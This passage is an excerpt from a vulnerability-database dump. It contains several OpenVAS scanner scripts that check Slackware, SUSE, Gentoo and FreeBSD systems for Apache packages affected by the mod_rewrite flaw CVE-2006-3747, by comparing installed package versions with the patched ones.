Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-209-01\";\n \nif(description)\n{\n script_id(57168);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-209-01 Apache httpd \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065309", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065309", "type": "openvas", "title": "SLES9: Security update for Apache and mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018358.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache and mod_ssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65309\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache and mod_ssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.21\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-01.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57851", "href": "http://plugins.openvas.org/nasl.php?oid=57851", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-01 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in mod_rewrite could result in a Denial of Service or the execution\nof arbitrary code.\";\ntag_solution = \"All Apache users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose net-www/apache\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=141986\nhttp://www.apache.org/dist/httpd/Announcement2.0.html\nhttp://www.apache.org/dist/httpd/Announcement1.3.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-01.\";\n\n \n\nif(description)\n{\n script_id(57851);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200608-01 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n 
script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"rge 1.3.34-r14\", \"rge 1.3.37\", \"ge 2.0.58-r2\"), vulnerable: make_list(\"lt 2.0.58-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231057168", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057168", "type": "openvas", "title": "Slackware Advisory SSA:2006-209-01 Apache httpd", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_209_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57168\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-209-01 Apache httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-209-01\");\n\n script_tag(name:\"insight\", value:\"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += 
res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65309", "href": "http://plugins.openvas.org/nasl.php?oid=65309", "type": "openvas", "title": "SLES9: Security update for Apache and mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018358.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache and mod_ssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65309);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache and mod_ssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.21\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The 
remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:57145", "href": "http://plugins.openvas.org/nasl.php?oid=57145", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID dc8c08c7-1e7c-11db-88cf-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+mod_perl\n apache+ipv6\n apache_fp\n ru-apache\n ru-apache+mod_ssl\n apache+ssl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n apache+mod_ssl+mod_accel\n apache+mod_ssl+mod_accel+ipv6\n apache+mod_ssl+mod_accel+mod_deflate\n apache+mod_ssl+mod_accel+mod_deflate+ipv6\n apache+mod_ssl+mod_deflate\n apache+mod_ssl+mod_deflate+ipv6\n apache+mod_ssl+mod_snmp\n apache+mod_ssl+mod_snmp+mod_accel\n apache+mod_ssl+mod_snmp+mod_accel+ipv6\n apache+mod_ssl+mod_snmp+mod_deflate\n apache+mod_ssl+mod_snmp+mod_deflate+ipv6\n apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://marc.theaimsgroup.com/?l=apache-httpd-announce&m=115409818602955\nhttp://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57145);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36_1\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.0.46\")>=0 && revcomp(a:bver, b:\"2.0.58_2\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.0\")>=0 && revcomp(a:bver, b:\"2.2.2_1\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36_1\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.37\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache_fp\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package apache_fp version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = 
portver(pkg:\"ru-apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ru-apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.34.1.57_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+mod_deflate 
version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_deflate version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && 